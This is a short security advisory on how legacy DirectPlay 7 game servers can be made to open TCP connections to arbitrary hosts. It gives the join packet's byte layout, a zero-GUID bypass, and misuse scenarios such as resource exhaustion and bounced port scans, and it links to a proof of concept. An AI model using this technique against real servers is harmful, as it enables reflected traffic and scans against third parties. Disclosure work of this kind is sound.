####################################################################### How to use DirectPlay 7 to create spoofed TCP connections 0.1 by Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### All the versions of Directplay before the 8 (so from the first Direct Play version existent until one or two years ago) uses a strange and bad method to manage players. To enter in a DirectPlay game server a client must do the following: client binds a TCP port (usually 2300) client -> server: UDP packet (to port 47624) server -> client: TCP connection exchange of data... The part we need to understand is the UDP packet sent from the client to the server. Its structure is similar to the following, the symbol ??? means a parameter I don't know: "\x34\x00" size of the entire packet "\xB0\xFA" DirectPlay sign "\x00\x00" client family [1] "\x00\x00" client TCP port [1] "\x00\x00\x00\x00" client IP address [1] "\0\0\0\0\0\0\0\0" ??? ever 0 "play" we wanna play "\x02\x00" ??? ever 2 "\x0E\x00" ??? ever 14 "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" GUID [2] "\x00\x00\x00\x00" ??? ever 0 "\x01\x00\x00\x00" ??? [1] In the UDP packet there is a sockaddr_in structure that will be used by the server to make the TCP connection to the client. The sockaddr_in structure in fact contains the family (AF_INET, it means we wanna use an Internet protocol), the TCP port on which the client waits the connections and the IP address to contact. If the IP is set to 0 the server will use the source IP address of the packet. Note that the game server will not reconnect to the same host and port if it is already connected, but will simply send a bit of data through the existent connection. [2] The GUID is used by Windows to identify programs or something similar, it is used here because the GUID we specify must be the same of the game server otherwise the packet will be rejected. BUT exists a workaround, using a GUID of zeros our packet will be accepted also we don't know the remote GUID used by that specific game! The most interesting part of the packet so is just the sockaddr_in structure letting ANY person to force a game server that uses the Directplay protocol to connect to ANY TCP port of ANY host we desire. The first risk could be to contact a lot of DirectPlay game servers that will connect to a specific port of a host (as a webserver) causing resources consumption of it but "currently" I don't know a DirectPlay game that is so widely used. This type of attack needs a lot of servers otherwise we can't consider it a risk and now that the new DirectPlay protocol (available from DirectX 8 and 9) has taken the place of the older, all the new games will use it so they are not vulnerables. Another risk could be "indirect", in fact some system admins don't like port-scannings and an attacker could use this DirectPlay problem to launch a port scanning from the victim game server to the server of a paranoid admin. That will give no results or informations to the attacker but "could" be a little problem for the game server (why you scan my server?). However the only thing I think is really important here is that this "problem" (it is not a bug but a feature of the DirectPlay protocol) is enough interesting and cool in my opinion. A proof-of-concept is available here: http://aluigi.org/papers/dplay7-spoof.zip #######################################################################